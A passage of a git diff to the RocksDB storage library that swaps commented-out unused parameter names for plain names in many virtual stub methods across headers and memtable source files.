/*outputpath*/) override { + virtual Status GetAbsolutePath(const std::string& db_path, + std::string* outputpath) override { return notsup; } - virtual void SetBackgroundThreads(int /*number*/, - Priority /*pri*/ = LOW) override {} - virtual int GetBackgroundThreads(Priority /*pri*/ = LOW) override { - return 0; + virtual void SetBackgroundThreads(int number, Priority pri = LOW) override {} + virtual int GetBackgroundThreads(Priority pri = LOW) override { return 0; } + virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) override { } - virtual void IncBackgroundThreadsIfNeeded(int /*number*/, - Priority /*pri*/) override {} - virtual std::string TimeToString(uint64_t /*number*/) override { return ""; } + virtual std::string TimeToString(uint64_t number) override { return ""; } virtual uint64_t GetThreadID() const override { return 0; diff --git a/include/rocksdb/cache.h b/include/rocksdb/cache.h index 88efdb05eeb..5ebd66bde88 100644 --- a/include/rocksdb/cache.h +++ b/include/rocksdb/cache.h @@ -189,8 +189,7 @@ class Cache { // Mark the last inserted object as being a raw data block. This will be used // in tests. The default implementation does nothing. - virtual void TEST_mark_as_data_block(const Slice& /*key*/, - size_t /*charge*/) {} + virtual void TEST_mark_as_data_block(const Slice& key, size_t charge) {} private: // No copying allowed diff --git a/include/rocksdb/compaction_filter.h b/include/rocksdb/compaction_filter.h index 94069a91490..9a8c0318c5d 100644 --- a/include/rocksdb/compaction_filter.h +++ b/include/rocksdb/compaction_filter.h @@ -97,10 +97,8 @@ class CompactionFilter { // The last paragraph is not true if you set max_subcompactions to more than // 1. In that case, subcompaction from multiple threads may call a single // CompactionFilter concurrently. - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*existing_value*/, - std::string* /*new_value*/, - bool* /*value_changed*/) const { + virtual bool Filter(int level, const Slice& key, const Slice& existing_value, + std::string* new_value, bool* value_changed) const { return false; } @@ -113,8 +111,8 @@ class CompactionFilter { // may not realize there is a write conflict and may allow a Transaction to // Commit that should have failed. Instead, it is better to implement any // Merge filtering inside the MergeOperator. 
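Before the FilterMergeOperand hunk that follows, for orientation: a minimal CompactionFilter matching the Filter() overload shown in the compaction_filter.h hunk above. DropByPrefix and the "tmp_" prefix are invented for this sketch.

#include <string>
#include "rocksdb/compaction_filter.h"
#include "rocksdb/options.h"
#include "rocksdb/slice.h"

// Drops every key carrying a given prefix during compaction; all other
// entries are kept as-is (returning false means "keep").
class DropByPrefix : public rocksdb::CompactionFilter {
 public:
  explicit DropByPrefix(std::string prefix) : prefix_(std::move(prefix)) {}

  bool Filter(int level, const rocksdb::Slice& key,
              const rocksdb::Slice& existing_value, std::string* new_value,
              bool* value_changed) const override {
    return key.starts_with(prefix_);  // true == remove this entry
  }

  const char* Name() const override { return "DropByPrefix"; }

 private:
  std::string prefix_;
};

// Usage: the filter must outlive the DB that uses it.
//   DropByPrefix filter("tmp_");
//   rocksdb::Options options;
//   options.compaction_filter = &filter;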
- virtual bool FilterMergeOperand(int /*level*/, const Slice& /*key*/, - const Slice& /*operand*/) const { + virtual bool FilterMergeOperand(int level, const Slice& key, + const Slice& operand) const { return false; } @@ -159,7 +157,7 @@ class CompactionFilter { // MergeOperator. virtual Decision FilterV2(int level, const Slice& key, ValueType value_type, const Slice& existing_value, std::string* new_value, - std::string* /*skip_until*/) const { + std::string* skip_until) const { switch (value_type) { case ValueType::kValue: { bool value_changed = false; diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index 7c1cc316ef3..ee5706b4c8b 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -855,7 +855,7 @@ class DB { // Flush the WAL memory buffer to the file. If sync is true, it calls SyncWAL // afterwards. - virtual Status FlushWAL(bool /*sync*/) { + virtual Status FlushWAL(bool sync) { return Status::NotSupported("FlushWAL not implemented"); } // Sync the wal. Note that Write() followed by SyncWAL() is not exactly the diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index 78864dd7982..8690738998f 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -170,9 +170,9 @@ class Env { // returns non-OK. // // The returned file will only be accessed by one thread at a time. - virtual Status ReopenWritableFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) { + virtual Status ReopenWritableFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) { return Status::NotSupported(); } @@ -187,9 +187,9 @@ class Env { // *result and returns OK. On failure returns non-OK. // // The returned file will only be accessed by one thread at a time. - virtual Status NewRandomRWFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) { + virtual Status NewRandomRWFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) { return Status::NotSupported("RandomRWFile is not implemented in this Env"); } @@ -257,8 +257,7 @@ class Env { const std::string& target) = 0; // Hard Link file src to target. - virtual Status LinkFile(const std::string& /*src*/, - const std::string& /*target*/) { + virtual Status LinkFile(const std::string& src, const std::string& target) { return Status::NotSupported("LinkFile is not supported for this Env"); } @@ -309,7 +308,7 @@ class Env { // Arrange to remove jobs for given arg from the queue_ if they are not // already scheduled. Caller is expected to have exclusive lock on arg. - virtual int UnSchedule(void* /*arg*/, Priority /*pri*/) { return 0; } + virtual int UnSchedule(void* arg, Priority pri) { return 0; } // Start a new thread, invoking "function(arg)" within the new thread. // When "function(arg)" returns, the thread will be destroyed. @@ -319,7 +318,7 @@ class Env { virtual void WaitForJoin() {} // Get thread pool queue length for specific thread pool. - virtual unsigned int GetThreadPoolQueueLen(Priority /*pri*/ = LOW) const { + virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const { return 0; } @@ -373,7 +372,7 @@ class Env { virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) = 0; // Lower IO priority for threads from the specified pool. 
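The env.h hunks around here cover the background thread-pool hooks (Schedule, UnSchedule, GetThreadPoolQueueLen, SetBackgroundThreads). A short sketch of how callers normally size the two pools; the thread counts are arbitrary.

#include "rocksdb/env.h"
#include "rocksdb/options.h"

void SizeBackgroundPools(rocksdb::Options* options) {
  rocksdb::Env* env = rocksdb::Env::Default();
  // The LOW pool runs compactions, the HIGH pool runs flushes.
  env->SetBackgroundThreads(4, rocksdb::Env::LOW);
  env->SetBackgroundThreads(2, rocksdb::Env::HIGH);
  options->env = env;
  // Let the DB actually use the threads created above.
  options->max_background_compactions = 4;
  options->max_background_flushes = 2;
}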
- virtual void LowerThreadPoolIOPriority(Priority /*pool*/ = LOW) {} + virtual void LowerThreadPoolIOPriority(Priority pool = LOW) {} // Converts seconds-since-Jan-01-1970 to a printable string virtual std::string TimeToString(uint64_t time) = 0; @@ -417,7 +416,7 @@ class Env { const ImmutableDBOptions& db_options) const; // Returns the status of all threads that belong to the current Env. - virtual Status GetThreadList(std::vector* /*thread_list*/) { + virtual Status GetThreadList(std::vector* thread_list) { return Status::NotSupported("Not supported."); } @@ -483,14 +482,14 @@ class SequentialFile { // Remove any kind of caching of data from the offset to offset+length // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. - virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { + virtual Status InvalidateCache(size_t offset, size_t length) { return Status::NotSupported("InvalidateCache not supported."); } // Positioned Read for direct I/O // If Direct I/O enabled, offset, n, and scratch should be properly aligned - virtual Status PositionedRead(uint64_t /*offset*/, size_t /*n*/, - Slice* /*result*/, char* /*scratch*/) { + virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result, + char* scratch) { return Status::NotSupported(); } }; @@ -516,7 +515,7 @@ class RandomAccessFile { char* scratch) const = 0; // Readahead the file starting from offset by n bytes for caching. - virtual Status Prefetch(uint64_t /*offset*/, size_t /*n*/) { + virtual Status Prefetch(uint64_t offset, size_t n) { return Status::OK(); } @@ -535,14 +534,14 @@ class RandomAccessFile { // a single varint. // // Note: these IDs are only valid for the duration of the process. - virtual size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const { + virtual size_t GetUniqueId(char* id, size_t max_size) const { return 0; // Default implementation to prevent issues with backwards // compatibility. }; enum AccessPattern { NORMAL, RANDOM, SEQUENTIAL, WILLNEED, DONTNEED }; - virtual void Hint(AccessPattern /*pattern*/) {} + virtual void Hint(AccessPattern pattern) {} // Indicates the upper layers if the current RandomAccessFile implementation // uses direct IO. @@ -555,7 +554,7 @@ class RandomAccessFile { // Remove any kind of caching of data from the offset to offset+length // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. - virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { + virtual Status InvalidateCache(size_t offset, size_t length) { return Status::NotSupported("InvalidateCache not supported."); } }; @@ -605,7 +604,9 @@ class WritableFile { // before closing. It is not always possible to keep track of the file // size due to whole pages writes. The behavior is undefined if called // with other writes to follow. 
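The WritableFile hunks that follow pair with the env_test.cc WritableFileWrapper test earlier in this patch. A sketch of such a wrapper that counts writes, assuming the WritableFileWrapper helper from include/rocksdb/env.h; the counter names are invented.

#include <atomic>
#include <cstdint>
#include "rocksdb/env.h"

// Forwards every call to the wrapped file and counts appends and syncs.
class CountingFile : public rocksdb::WritableFileWrapper {
 public:
  explicit CountingFile(rocksdb::WritableFile* target)
      : rocksdb::WritableFileWrapper(target) {}

  rocksdb::Status Append(const rocksdb::Slice& data) override {
    appends_.fetch_add(1);
    return rocksdb::WritableFileWrapper::Append(data);
  }
  rocksdb::Status Sync() override {
    syncs_.fetch_add(1);
    return rocksdb::WritableFileWrapper::Sync();
  }

  std::atomic<uint64_t> appends_{0};
  std::atomic<uint64_t> syncs_{0};
};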
- virtual Status Truncate(uint64_t /*size*/) { return Status::OK(); } + virtual Status Truncate(uint64_t size) { + return Status::OK(); + } virtual Status Close() = 0; virtual Status Flush() = 0; virtual Status Sync() = 0; // sync data @@ -667,7 +668,7 @@ class WritableFile { } // For documentation, refer to RandomAccessFile::GetUniqueId() - virtual size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const { + virtual size_t GetUniqueId(char* id, size_t max_size) const { return 0; // Default implementation to prevent issues with backwards } @@ -675,7 +676,7 @@ class WritableFile { // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. // This call has no effect on dirty pages in the cache. - virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { + virtual Status InvalidateCache(size_t offset, size_t length) { return Status::NotSupported("InvalidateCache not supported."); } @@ -685,9 +686,7 @@ class WritableFile { // This asks the OS to initiate flushing the cached data to disk, // without waiting for completion. // Default implementation does nothing. - virtual Status RangeSync(uint64_t /*offset*/, uint64_t /*nbytes*/) { - return Status::OK(); - } + virtual Status RangeSync(uint64_t offset, uint64_t nbytes) { return Status::OK(); } // PrepareWrite performs any necessary preparation for a write // before the write actually occurs. This allows for pre-allocation @@ -714,7 +713,7 @@ class WritableFile { } // Pre-allocates space for a file. - virtual Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) { + virtual Status Allocate(uint64_t offset, uint64_t len) { return Status::OK(); } diff --git a/include/rocksdb/filter_policy.h b/include/rocksdb/filter_policy.h index d442837e61e..8c813d93e65 100644 --- a/include/rocksdb/filter_policy.h +++ b/include/rocksdb/filter_policy.h @@ -45,7 +45,7 @@ class FilterBitsBuilder { virtual Slice Finish(std::unique_ptr* buf) = 0; // Calculate num of entries fit into a space. - virtual int CalculateNumEntry(const uint32_t /*space*/) { + virtual int CalculateNumEntry(const uint32_t space) { #ifndef ROCKSDB_LITE throw std::runtime_error("CalculateNumEntry not Implemented"); #else @@ -114,8 +114,7 @@ class FilterPolicy { // Get the FilterBitsReader, which is ONLY used for full filter block // It contains interface to tell if key can be in filter // The input slice should NOT be deleted by FilterPolicy - virtual FilterBitsReader* GetFilterBitsReader( - const Slice& /*contents*/) const { + virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents) const { return nullptr; } }; diff --git a/include/rocksdb/iterator.h b/include/rocksdb/iterator.h index cb734eccd93..4e09f64e9a6 100644 --- a/include/rocksdb/iterator.h +++ b/include/rocksdb/iterator.h @@ -51,7 +51,7 @@ class Iterator : public Cleanable { // Position at the last key in the source that at or before target // The iterator is Valid() after this call iff the source contains // an entry that comes at or before target. - virtual void SeekForPrev(const Slice& /*target*/) {} + virtual void SeekForPrev(const Slice& target) {} // Moves to the next entry in the source. After this call, Valid() is // true iff the iterator was not positioned at the last entry in the source. diff --git a/include/rocksdb/listener.h b/include/rocksdb/listener.h index b44c7a6900f..40d318e0941 100644 --- a/include/rocksdb/listener.h +++ b/include/rocksdb/listener.h @@ -345,8 +345,8 @@ class EventListener { // returns. 
Otherwise, RocksDB may be blocked. // @param handle is a pointer to the column family handle to be deleted // which will become a dangling pointer after the deletion. - virtual void OnColumnFamilyHandleDeletionStarted( - ColumnFamilyHandle* /*handle*/) {} + virtual void OnColumnFamilyHandleDeletionStarted(ColumnFamilyHandle* handle) { + } // A call-back function for RocksDB which will be called after an external // file is ingested using IngestExternalFile. diff --git a/include/rocksdb/memtablerep.h b/include/rocksdb/memtablerep.h index 1256515d570..347dd3096c2 100644 --- a/include/rocksdb/memtablerep.h +++ b/include/rocksdb/memtablerep.h @@ -89,14 +89,14 @@ class MemTableRep { // // Currently only skip-list based memtable implement the interface. Other // implementations will fallback to Insert() by default. - virtual void InsertWithHint(KeyHandle handle, void** /*hint*/) { + virtual void InsertWithHint(KeyHandle handle, void** hint) { // Ignore the hint by default. Insert(handle); } // Like Insert(handle), but may be called concurrent with other calls // to InsertConcurrently for other handles - virtual void InsertConcurrently(KeyHandle /*handle*/) { + virtual void InsertConcurrently(KeyHandle handle) { #ifndef ROCKSDB_LITE throw std::runtime_error("concurrent insert not supported"); #else @@ -128,8 +128,8 @@ class MemTableRep { virtual void Get(const LookupKey& k, void* callback_args, bool (*callback_func)(void* arg, const char* entry)); - virtual uint64_t ApproximateNumEntries(const Slice& /*start_ikey*/, - const Slice& /*end_key*/) { + virtual uint64_t ApproximateNumEntries(const Slice& start_ikey, + const Slice& end_key) { return 0; } diff --git a/include/rocksdb/merge_operator.h b/include/rocksdb/merge_operator.h index c32249ee8fa..5fe3e0bfda8 100644 --- a/include/rocksdb/merge_operator.h +++ b/include/rocksdb/merge_operator.h @@ -66,9 +66,11 @@ class MergeOperator { // internal corruption. This will be treated as an error by the library. // // Also make use of the *logger for error messages. - virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, - const std::deque& /*operand_list*/, - std::string* /*new_value*/, Logger* /*logger*/) const { + virtual bool FullMerge(const Slice& key, + const Slice* existing_value, + const std::deque& operand_list, + std::string* new_value, + Logger* logger) const { // deprecated, please use FullMergeV2() assert(false); return false; @@ -143,10 +145,9 @@ class MergeOperator { // If there is corruption in the data, handle it in the FullMergeV2() function // and return false there. The default implementation of PartialMerge will // always return false. - virtual bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/, - const Slice& /*right_operand*/, - std::string* /*new_value*/, - Logger* /*logger*/) const { + virtual bool PartialMerge(const Slice& key, const Slice& left_operand, + const Slice& right_operand, std::string* new_value, + Logger* logger) const { return false; } diff --git a/include/rocksdb/rate_limiter.h b/include/rocksdb/rate_limiter.h index 995bf952f9f..838c98a6de6 100644 --- a/include/rocksdb/rate_limiter.h +++ b/include/rocksdb/rate_limiter.h @@ -45,7 +45,7 @@ class RateLimiter { // Request for token for bytes. If this request can not be satisfied, the call // is blocked. 
Caller is responsible to make sure // bytes <= GetSingleBurstBytes() - virtual void Request(const int64_t /*bytes*/, const Env::IOPriority /*pri*/) { + virtual void Request(const int64_t bytes, const Env::IOPriority pri) { assert(false); } diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index b45f95c10b7..fe8dee00f04 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -173,7 +173,7 @@ class PinnableSlice : public Slice, public Cleanable { } } - void remove_prefix(size_t /*n*/) { + void remove_prefix(size_t n) { assert(0); // Not implemented } diff --git a/include/rocksdb/slice_transform.h b/include/rocksdb/slice_transform.h index 2143057df8d..fc82bf58456 100644 --- a/include/rocksdb/slice_transform.h +++ b/include/rocksdb/slice_transform.h @@ -58,7 +58,7 @@ class SliceTransform { virtual bool InDomain(const Slice& key) const = 0; // This is currently not used and remains here for backward compatibility. - virtual bool InRange(const Slice& /*dst*/) const { return false; } + virtual bool InRange(const Slice& dst) const { return false; } // Transform(s)=Transform(`prefix`) for any s with `prefix` as a prefix. // @@ -83,7 +83,7 @@ class SliceTransform { // "abcd,e", the file can be filtered out and the key will be invisible. // // i.e., an implementation always returning false is safe. - virtual bool SameResultWhenAppended(const Slice& /*prefix*/) const { + virtual bool SameResultWhenAppended(const Slice& prefix) const { return false; } }; diff --git a/include/rocksdb/statistics.h b/include/rocksdb/statistics.h index ad395cae475..b4629358e66 100644 --- a/include/rocksdb/statistics.h +++ b/include/rocksdb/statistics.h @@ -445,7 +445,7 @@ class Statistics { virtual uint64_t getTickerCount(uint32_t tickerType) const = 0; virtual void histogramData(uint32_t type, HistogramData* const data) const = 0; - virtual std::string getHistogramString(uint32_t /*type*/) const { return ""; } + virtual std::string getHistogramString(uint32_t type) const { return ""; } virtual void recordTick(uint32_t tickerType, uint64_t count = 0) = 0; virtual void setTickerCount(uint32_t tickerType, uint64_t count) = 0; virtual uint64_t getAndResetTickerCount(uint32_t tickerType) = 0; diff --git a/include/rocksdb/utilities/geo_db.h b/include/rocksdb/utilities/geo_db.h index ec3cbdf265a..408774c5990 100644 --- a/include/rocksdb/utilities/geo_db.h +++ b/include/rocksdb/utilities/geo_db.h @@ -80,7 +80,7 @@ class GeoDB : public StackableDB { // GeoDB owns the pointer `DB* db` now. You should not delete it or // use it after the invocation of GeoDB // GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {} - GeoDB(DB* db, const GeoDBOptions& /*options*/) : StackableDB(db) {} + GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {} virtual ~GeoDB() {} // Insert a new object into the location database. 
The object is diff --git a/include/rocksdb/utilities/optimistic_transaction_db.h b/include/rocksdb/utilities/optimistic_transaction_db.h index 518bc610c6d..02917ff5830 100644 --- a/include/rocksdb/utilities/optimistic_transaction_db.h +++ b/include/rocksdb/utilities/optimistic_transaction_db.h @@ -62,7 +62,7 @@ class OptimisticTransactionDB { protected: // To Create an OptimisticTransactionDB, call Open() - explicit OptimisticTransactionDB(DB* /*db*/) {} + explicit OptimisticTransactionDB(DB* db) {} OptimisticTransactionDB() {} private: diff --git a/include/rocksdb/utilities/transaction.h b/include/rocksdb/utilities/transaction.h index a461c9e856a..8507ef133fb 100644 --- a/include/rocksdb/utilities/transaction.h +++ b/include/rocksdb/utilities/transaction.h @@ -402,8 +402,8 @@ class Transaction { virtual bool IsDeadlockDetect() const { return false; } - virtual std::vector GetWaitingTxns( - uint32_t* /*column_family_id*/, std::string* /*key*/) const { + virtual std::vector GetWaitingTxns(uint32_t* column_family_id, + std::string* key) const { assert(false); return std::vector(); } @@ -423,7 +423,7 @@ class Transaction { void SetState(TransactionState state) { txn_state_ = state; } protected: - explicit Transaction(const TransactionDB* /*db*/) {} + explicit Transaction(const TransactionDB* db) {} Transaction() {} // the log in which the prepared section for this txn resides diff --git a/include/rocksdb/wal_filter.h b/include/rocksdb/wal_filter.h index a22dca92377..686fa499893 100644 --- a/include/rocksdb/wal_filter.h +++ b/include/rocksdb/wal_filter.h @@ -44,8 +44,8 @@ class WalFilter { // @params cf_name_id_map column_family_name to column_family_id map virtual void ColumnFamilyLogNumberMap( - const std::map& /*cf_lognumber_map*/, - const std::map& /*cf_name_id_map*/) {} + const std::map& cf_lognumber_map, + const std::map& cf_name_id_map) {} // LogRecord is invoked for each log record encountered for all the logs // during replay on logs on recovery. This method can be used to: @@ -75,9 +75,11 @@ class WalFilter { // @returns Processing option for the current record. // Please see WalProcessingOption enum above for // details. - virtual WalProcessingOption LogRecordFound( - unsigned long long /*log_number*/, const std::string& /*log_file_name*/, - const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) { + virtual WalProcessingOption LogRecordFound(unsigned long long log_number, + const std::string& log_file_name, + const WriteBatch& batch, + WriteBatch* new_batch, + bool* batch_changed) { // Default implementation falls back to older function for compatibility return LogRecord(batch, new_batch, batch_changed); } @@ -85,9 +87,9 @@ class WalFilter { // Please see the comments for LogRecord above. This function is for // compatibility only and contains a subset of parameters. // New code should use the function above. 
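Ahead of the LogRecord hunk below, a sketch of a WAL filter that counts recovered records and changes nothing; CountingWalFilter is an invented name, and registration goes through DBOptions::wal_filter.

#include <atomic>
#include <cstdint>
#include "rocksdb/wal_filter.h"
#include "rocksdb/write_batch.h"

// Counts WAL records seen during recovery; every record is kept as-is.
class CountingWalFilter : public rocksdb::WalFilter {
 public:
  WalProcessingOption LogRecord(const rocksdb::WriteBatch& batch,
                                rocksdb::WriteBatch* new_batch,
                                bool* batch_changed) const override {
    records_.fetch_add(1);
    return WalProcessingOption::kContinueProcessing;
  }

  const char* Name() const override { return "CountingWalFilter"; }

  mutable std::atomic<uint64_t> records_{0};
};

// Usage: options.wal_filter = &filter; the filter must outlive DB::Open().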
- virtual WalProcessingOption LogRecord(const WriteBatch& /*batch*/, - WriteBatch* /*new_batch*/, - bool* /*batch_changed*/) const { + virtual WalProcessingOption LogRecord(const WriteBatch& batch, + WriteBatch* new_batch, + bool* batch_changed) const { return WalProcessingOption::kContinueProcessing; } diff --git a/include/rocksdb/write_batch.h b/include/rocksdb/write_batch.h index d708933f842..8bd93d36c4e 100644 --- a/include/rocksdb/write_batch.h +++ b/include/rocksdb/write_batch.h @@ -217,9 +217,8 @@ class WriteBatch : public WriteBatchBase { } virtual void SingleDelete(const Slice& /*key*/) {} - virtual Status DeleteRangeCF(uint32_t /*column_family_id*/, - const Slice& /*begin_key*/, - const Slice& /*end_key*/) { + virtual Status DeleteRangeCF(uint32_t column_family_id, + const Slice& begin_key, const Slice& end_key) { return Status::InvalidArgument("DeleteRangeCF not implemented"); } @@ -241,16 +240,16 @@ class WriteBatch : public WriteBatchBase { return Status::InvalidArgument("MarkBeginPrepare() handler not defined."); } - virtual Status MarkEndPrepare(const Slice& /*xid*/) { + virtual Status MarkEndPrepare(const Slice& xid) { return Status::InvalidArgument("MarkEndPrepare() handler not defined."); } - virtual Status MarkRollback(const Slice& /*xid*/) { + virtual Status MarkRollback(const Slice& xid) { return Status::InvalidArgument( "MarkRollbackPrepare() handler not defined."); } - virtual Status MarkCommit(const Slice& /*xid*/) { + virtual Status MarkCommit(const Slice& xid) { return Status::InvalidArgument("MarkCommit() handler not defined."); } diff --git a/memtable/hash_cuckoo_rep.cc b/memtable/hash_cuckoo_rep.cc index 39078633f67..034bf5858b6 100644 --- a/memtable/hash_cuckoo_rep.cc +++ b/memtable/hash_cuckoo_rep.cc @@ -597,8 +597,8 @@ void HashCuckooRep::Iterator::Seek(const Slice& user_key, } // Retreat to the last entry with a key <= target -void HashCuckooRep::Iterator::SeekForPrev(const Slice& /*user_key*/, - const char* /*memtable_key*/) { +void HashCuckooRep::Iterator::SeekForPrev(const Slice& user_key, + const char* memtable_key) { assert(false); } @@ -623,7 +623,7 @@ void HashCuckooRep::Iterator::SeekToLast() { MemTableRep* HashCuckooRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* /*transform*/, Logger* /*logger*/) { + const SliceTransform* transform, Logger* logger) { // The estimated average fullness. The write performance of any close hash // degrades as the fullness of the mem-table increases. 
Setting kFullness // to a value around 0.7 can better avoid write performance degradation while diff --git a/memtable/hash_linklist_rep.cc b/memtable/hash_linklist_rep.cc index b23a9f5e51d..932b62a3460 100644 --- a/memtable/hash_linklist_rep.cc +++ b/memtable/hash_linklist_rep.cc @@ -362,14 +362,14 @@ class HashLinkListRep : public MemTableRep { // Advance to the first entry with a key >= target virtual void Seek(const Slice& internal_key, - const char* /*memtable_key*/) override { + const char* memtable_key) override { node_ = hash_link_list_rep_->FindGreaterOrEqualInBucket(head_, internal_key); } // Retreat to the last entry with a key <= target - virtual void SeekForPrev(const Slice& /*internal_key*/, - const char* /*memtable_key*/) override { + virtual void SeekForPrev(const Slice& internal_key, + const char* memtable_key) override { // Since we do not support Prev() // We simply do not support SeekForPrev Reset(nullptr); @@ -483,10 +483,10 @@ class HashLinkListRep : public MemTableRep { } virtual void Next() override {} virtual void Prev() override {} - virtual void Seek(const Slice& /*user_key*/, - const char* /*memtable_key*/) override {} - virtual void SeekForPrev(const Slice& /*user_key*/, - const char* /*memtable_key*/) override {} + virtual void Seek(const Slice& user_key, + const char* memtable_key) override {} + virtual void SeekForPrev(const Slice& user_key, + const char* memtable_key) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} diff --git a/memtable/hash_skiplist_rep.cc b/memtable/hash_skiplist_rep.cc index 93082b1ec28..e34743eb2c7 100644 --- a/memtable/hash_skiplist_rep.cc +++ b/memtable/hash_skiplist_rep.cc @@ -131,8 +131,8 @@ class HashSkipListRep : public MemTableRep { } // Retreat to the last entry with a key <= target - virtual void SeekForPrev(const Slice& /*internal_key*/, - const char* /*memtable_key*/) override { + virtual void SeekForPrev(const Slice& internal_key, + const char* memtable_key) override { // not supported assert(false); } @@ -219,10 +219,10 @@ class HashSkipListRep : public MemTableRep { } virtual void Next() override {} virtual void Prev() override {} - virtual void Seek(const Slice& /*internal_key*/, - const char* /*memtable_key*/) override {} - virtual void SeekForPrev(const Slice& /*internal_key*/, - const char* /*memtable_key*/) override {} + virtual void Seek(const Slice& internal_key, + const char* memtable_key) override {} + virtual void SeekForPrev(const Slice& internal_key, + const char* memtable_key) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} @@ -335,7 +335,7 @@ MemTableRep::Iterator* HashSkipListRep::GetDynamicPrefixIterator(Arena* arena) { MemTableRep* HashSkipListRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* /*logger*/) { + const SliceTransform* transform, Logger* logger) { return new HashSkipListRep(compare, allocator, transform, bucket_count_, skiplist_height_, skiplist_branching_factor_); } diff --git a/memtable/skiplistrep.cc b/memtable/skiplistrep.cc index 235d33b818d..f56be5dcb62 100644 --- a/memtable/skiplistrep.cc +++ b/memtable/skiplistrep.cc @@ -270,7 +270,7 @@ class SkipListRep : public MemTableRep { MemTableRep* SkipListFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* /*logger*/) { + const SliceTransform* transform, Logger* logger) { return new 
SkipListRep(compare, allocator, transform, lookahead_); }
diff --git a/memtable/vectorrep.cc b/memtable/vectorrep.cc index 378b29624af..e54025c2d3d 100644 --- a/memtable/vectorrep.cc +++ b/memtable/vectorrep.cc @@ -227,8 +227,8 @@ void VectorRep::Iterator::Seek(const Slice& user_key, } // Advance to the first entry with a key <= target -void VectorRep::Iterator::SeekForPrev(const Slice& /*user_key*/, - const char* /*memtable_key*/) { +void VectorRep::Iterator::SeekForPrev(const Slice& user_key, + const char* memtable_key) { assert(false); } @@ -296,7 +296,7 @@ MemTableRep::Iterator* VectorRep::GetIterator(Arena* arena) { MemTableRep* VectorRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform*, Logger* /*logger*/) { + const SliceTransform*, Logger* logger) { return new VectorRep(compare, allocator, count_); } } // namespace rocksdb
diff --git a/options/options_helper.cc b/options/options_helper.cc index 82c734cba99..9e984f6e39e 100644 --- a/options/options_helper.cc +++ b/options/options_helper.cc @@ -1129,7 +1129,7 @@ Status GetPlainTableOptionsFromMap( const PlainTableOptions& table_options, const std::unordered_map<std::string, std::string>& opts_map, PlainTableOptions* new_table_options, bool input_strings_escaped, - bool /*ignore_unknown_options*/) { + bool ignore_unknown_options) { assert(new_table_options); *new_table_options = table_options; for (const auto& o : opts_map) {
diff --git a/options/options_parser.cc b/options/options_parser.cc index fc4e119f3db..d5a3fec6ef0 100644 --- a/options/options_parser.cc +++ b/options/options_parser.cc @@ -689,7 +689,7 @@ Status RocksDBOptionsParser::VerifyRocksDBOptionsFromFile( Status RocksDBOptionsParser::VerifyDBOptions( const DBOptions& base_opt, const DBOptions& persisted_opt, - const std::unordered_map<std::string, std::string>* /*opt_map*/, + const std::unordered_map<std::string, std::string>* opt_map, OptionsSanityCheckLevel sanity_check_level) { for (auto pair : db_options_type_info) { if (pair.second.verification == OptionVerificationType::kDeprecated) {
diff --git a/port/port_posix.cc b/port/port_posix.cc index e3af7726024..59241daff44 100644 --- a/port/port_posix.cc +++ b/port/port_posix.cc @@ -35,7 +35,7 @@ static int PthreadCall(const char* label, int result) { return result; } -Mutex::Mutex(bool /*adaptive*/) { +Mutex::Mutex(bool adaptive) { #ifdef ROCKSDB_PTHREAD_ADAPTIVE_MUTEX if (!adaptive) { PthreadCall("init mutex", pthread_mutex_init(&mu_, nullptr));
diff --git a/port/stack_trace.cc b/port/stack_trace.cc index 6f657be51b2..baaf140142d 100644 --- a/port/stack_trace.cc +++ b/port/stack_trace.cc @@ -13,7 +13,7 @@ namespace rocksdb { namespace port { void InstallStackTraceHandler() {} -void PrintStack(int /*first_frames_to_skip*/) {} +void PrintStack(int first_frames_to_skip) {} } // namespace port } // namespace rocksdb
